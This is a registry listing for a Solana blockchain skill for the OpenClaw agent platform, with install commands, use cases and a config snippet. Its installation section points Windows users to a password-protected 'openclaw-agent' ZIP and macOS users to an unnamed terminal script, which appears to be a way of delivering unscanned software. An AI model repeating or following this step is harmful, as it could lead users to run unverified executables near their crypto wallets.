ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Learn how to use the Solana skill for OpenClaw to check wallet balances, audit transactions, monitor SPL tokens, and decode NFT metadata directly through your AI agent.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-tbcxe
Or

What This Skill Does

The Solana skill for OpenClaw empowers users to interact directly with the Solana blockchain ecosystem. It serves as a comprehensive command-line interface wrapper for essential blockchain operations, including real-time balance tracking, SPL token management, transaction auditing, and NFT metadata exploration. By integrating with the openclaw-agent, this skill bridges the gap between local system commands and decentralized finance, allowing agents to fetch data from various clusters (Mainnet, Devnet, and custom RPCs) with precision. Whether you are managing a portfolio of assets, verifying transaction signatures, or monitoring stake account health, this skill provides the underlying connectivity to perform these tasks programmatically.

Installation

Installation requires two phases: local agent preparation and skill enablement. First, ensure the openclaw-agent is running on your host system (Windows users should download the official ZIP and extract using the password 'openclaw'; macOS users should follow the terminal-based installation script provided in the documentation). Once the agent is active, install the Solana CLI via the standard binary installer. Finally, activate the skill within the OpenClaw environment by executing: clawhub install openclaw/skills/skills/hightower6eu/solana-tbcxe. Verify your configuration by setting your primary RPC endpoint with solana config set --url https://api.mainnet-beta.solana.com.

Use Cases

This skill is ideal for power users and developers requiring automated blockchain insights. Common use cases include: automating daily portfolio balance monitoring, verifying the receipt of SPL tokens without using a GUI wallet, debugging transaction failures by fetching deep-dive account metadata, and auditing NFT collections using Metaboss for metadata decoding. It is particularly useful for setting up continuous monitoring scripts or integrating blockchain data into custom agent workflows.

Example Prompts

  1. "Check the current SOL balance for my wallet at 7xKy... and list all my active SPL token accounts."
  2. "Get the latest metadata for the NFT with mint address GzV5... using the metaboss integration."
  3. "Monitor my wallet address 5aBc... every 5 seconds and alert me if the balance changes significantly."

Tips & Limitations

Always ensure the openclaw-agent is running before issuing commands, as connection errors often stem from a dead agent process. Be aware that the accuracy of your data is highly dependent on the RPC provider you select; for critical operations, consider using a private or dedicated RPC node to avoid rate limits or latency issues inherent in public endpoints. Use --output json flags when parsing data to ensure your agent handles the raw information reliably. Finally, never share private keys, as this skill interacts with public data and is intended for non-custodial auditing and data retrieval purposes only.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-tbcxe": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#finance#crypto
Safety Score: 3/5

Flags: network-access, external-api, code-execution